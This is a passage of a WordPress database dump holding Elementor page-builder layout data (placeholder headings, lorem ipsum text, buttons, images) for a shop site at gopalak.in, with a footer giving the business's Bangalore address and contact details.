mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8320,1463,'_elementor_page_assets','a:0:{}'),(8323,1464,'_elementor_edit_mode','builder'),(8324,1464,'_elementor_template_type','wp-page'),(8325,1464,'_elementor_version','3.7.7'),(8326,1464,'_wp_page_template','elementor_canvas'),(8327,1464,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8328,1464,'_elementor_page_assets','a:0:{}'),(8330,1465,'_elementor_edit_mode','builder'),(8331,1465,'_elementor_template_type','wp-page'),(8332,1465,'_elementor_version','3.7.7'),(8333,1465,'_wp_page_template','elementor_canvas'),(8334,1465,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 